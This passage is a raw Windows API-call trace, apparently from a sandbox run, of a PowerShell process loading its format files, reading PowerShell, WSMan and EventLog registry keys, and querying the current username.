lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x8b4, lpOverlapped=0x0) returned 1 [0145.525] GetLastError () returned 0x0 [0145.525] ReadFile (in: hFile=0x1e4, lpBuffer=0x335f274, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335f274*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.525] GetLastError () returned 0x0 [0145.525] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.525] GetLastError () returned 0x0 [0145.525] CloseHandle (hObject=0x1e4) returned 1 [0145.525] GetLastError () returned 0x0 [0145.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0145.525] GetLastError () returned 0x0 [0145.526] SetErrorMode (uMode=0x1) returned 0x1 [0145.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3380e1c | out: lpFileInformation=0x3380e1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0145.526] GetLastError () returned 0x0 [0145.526] SetErrorMode (uMode=0x1) returned 0x1 [0145.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0145.526] GetLastError () returned 0x0 [0145.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.526] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.526] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.526] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0145.526] GetLastError () returned 0x0 [0145.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0145.526] GetLastError () returned 0x0 [0145.527] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x57e93faf, Data2=0xde3a, Data3=0x4671, Data4=([0]=0x88, [1]=0xcc, [2]=0x54, [3]=0x19, [4]=0x3a, [5]=0xd5, [6]=0xd, [7]=0x63))) returned 0x0 [0145.527] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x71aefb14, Data2=0xce54, Data3=0x418a, Data4=([0]=0xa5, [1]=0xd1, [2]=0x15, [3]=0x6b, [4]=0xdf, [5]=0xf5, [6]=0x8, [7]=0x2d))) returned 0x0 [0145.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0145.528] GetLastError () returned 0x0 [0145.528] SetErrorMode (uMode=0x1) returned 0x1 [0145.528] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.528] GetLastError () returned 0x0 [0145.528] GetFileType (hFile=0x1e4) returned 0x1 [0145.528] SetErrorMode (uMode=0x1) returned 0x1 [0145.528] GetFileType (hFile=0x1e4) returned 0x1 [0145.528] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.529] GetLastError () returned 0x0 [0145.530] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.530] GetLastError () returned 0x0 [0145.531] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.531] GetLastError () returned 0x0 [0145.531] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.531] GetLastError () returned 0x0 [0145.532] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0xe98, lpOverlapped=0x0) returned 1 [0145.532] GetLastError () returned 0x0 [0145.532] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396364, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396364*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.532] GetLastError () returned 0x0 [0145.532] ReadFile (in: hFile=0x1e4, lpBuffer=0x3396d2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x3396d2c*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.532] GetLastError () returned 0x0 [0145.532] CloseHandle (hObject=0x1e4) returned 1 [0145.532] GetLastError () returned 0x0 [0145.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0145.532] GetLastError () returned 0x0 [0145.532] SetErrorMode (uMode=0x1) returned 0x1 [0145.532] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x33b7d28 | out: lpFileInformation=0x33b7d28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0145.532] GetLastError () returned 0x0 [0145.532] SetErrorMode (uMode=0x1) returned 0x1 [0145.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0145.532] GetLastError () returned 0x0 [0145.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.533] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.533] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.533] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0145.533] GetLastError () returned 0x0 [0145.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0145.533] GetLastError () returned 0x0 [0145.534] VirtualQuery (in: lpAddress=0x24cfa0, lpBuffer=0x24dfa0, dwLength=0x1c | out: lpBuffer=0x24dfa0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.534] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x17b05965, Data2=0xead3, Data3=0x45f4, Data4=([0]=0xbc, [1]=0x3b, [2]=0xe7, [3]=0xf2, [4]=0x6b, [5]=0x2c, [6]=0x6, [7]=0x93))) returned 0x0 [0145.534] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa91bcb11, Data2=0xa04c, Data3=0x401e, Data4=([0]=0x91, [1]=0xca, [2]=0x87, [3]=0x67, [4]=0xbb, [5]=0x7, [6]=0xb7, [7]=0xca))) returned 0x0 [0145.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0145.547] GetLastError () returned 0x57 [0145.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0145.547] GetLastError () returned 0x57 [0145.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0145.549] GetLastError () returned 0x57 [0145.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0145.550] GetLastError () returned 0x57 [0145.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.551] GetLastError () returned 0x57 [0145.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.552] GetLastError () returned 0x57 [0145.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.574] GetLastError () returned 0xcb [0145.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e33c | out: phkResult=0x24e33c*=0x1e4) returned 0x0 [0145.630] RegQueryInfoKeyW (in: hKey=0x1e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e38c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e390, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e38c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e390*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.631] RegEnumValueW (in: hKey=0x1e4, dwIndex=0x0, lpValueName=0x338390, lpcchValueName=0x24e3b4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24e3b4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.631] RegEnumValueW (in: hKey=0x1e4, dwIndex=0x1, lpValueName=0x338390, lpcchValueName=0x24e3b4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24e3b4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.632] RegQueryValueExW (in: hKey=0x1e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e394, lpData=0x0, lpcbData=0x24e390*=0x0 | out: lpType=0x24e394*=0x1, lpData=0x0, lpcbData=0x24e390*=0x8) returned 0x0 [0145.632] RegQueryValueExW (in: hKey=0x1e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e394, lpData=0x338390, lpcbData=0x24e390*=0x8 | out: lpType=0x24e394*=0x1, lpData="2.0", lpcbData=0x24e390*=0x8) returned 0x0 [0145.765] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2f8 | out: phkResult=0x24e2f8*=0x1ec) returned 0x0 [0145.765] RegQueryInfoKeyW (in: hKey=0x1ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e348, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e34c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e348*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e34c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.765] RegEnumValueW (in: hKey=0x1ec, dwIndex=0x0, lpValueName=0x338390, lpcchValueName=0x24e370, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24e370, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.765] RegEnumValueW (in: hKey=0x1ec, dwIndex=0x1, lpValueName=0x338390, lpcchValueName=0x24e370, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24e370, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.766] RegQueryValueExW (in: hKey=0x1ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e350, lpData=0x0, lpcbData=0x24e34c*=0x0 | out: lpType=0x24e350*=0x1, lpData=0x0, lpcbData=0x24e34c*=0x8) returned 0x0 [0145.766] RegQueryValueExW (in: hKey=0x1ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e350, lpData=0x338390, lpcbData=0x24e34c*=0x8 | out: lpType=0x24e350*=0x1, lpData="2.0", lpcbData=0x24e34c*=0x8) returned 0x0 [0145.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.767] GetLastError () returned 0xcb [0145.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.769] GetLastError () returned 0xcb [0145.892] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2b8 | out: phkResult=0x24e2b8*=0x1e8) returned 0x0 [0145.892] RegQueryInfoKeyW (in: hKey=0x1e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e320, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e31c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e320*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e31c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.893] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x0, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.893] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x1, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.893] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x2, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.893] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x3, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x4, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x5, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x6, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x7, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegEnumKeyExW (in: hKey=0x1e8, dwIndex=0x8, lpName=0x338390, lpcchName=0x24e33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.894] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x324) returned 0x0 [0145.895] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.895] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x328) returned 0x0 [0145.895] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.895] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x344) returned 0x0 [0145.895] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.895] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x350) returned 0x0 [0145.896] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.896] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x354) returned 0x0 [0145.896] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.896] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x358) returned 0x0 [0145.896] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0145.896] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x5 [0146.055] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x35c) returned 0x0 [0146.056] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x0) returned 0x2 [0146.056] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x360) returned 0x0 [0146.056] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e2e8 | out: phkResult=0x24e2e8*=0x364) returned 0x0 [0146.056] RegCloseKey (hKey=0x364) returned 0x0 [0146.056] RegCloseKey (hKey=0x1e8) returned 0x0 [0146.057] RegCloseKey (hKey=0x360) returned 0x0 [0146.067] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.069] GetLastError () returned 0x3 [0146.069] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.157] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e29c | out: phkResult=0x24e29c*=0x1e8) returned 0x0 [0146.157] RegQueryInfoKeyW (in: hKey=0x1e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e304, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e300, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, 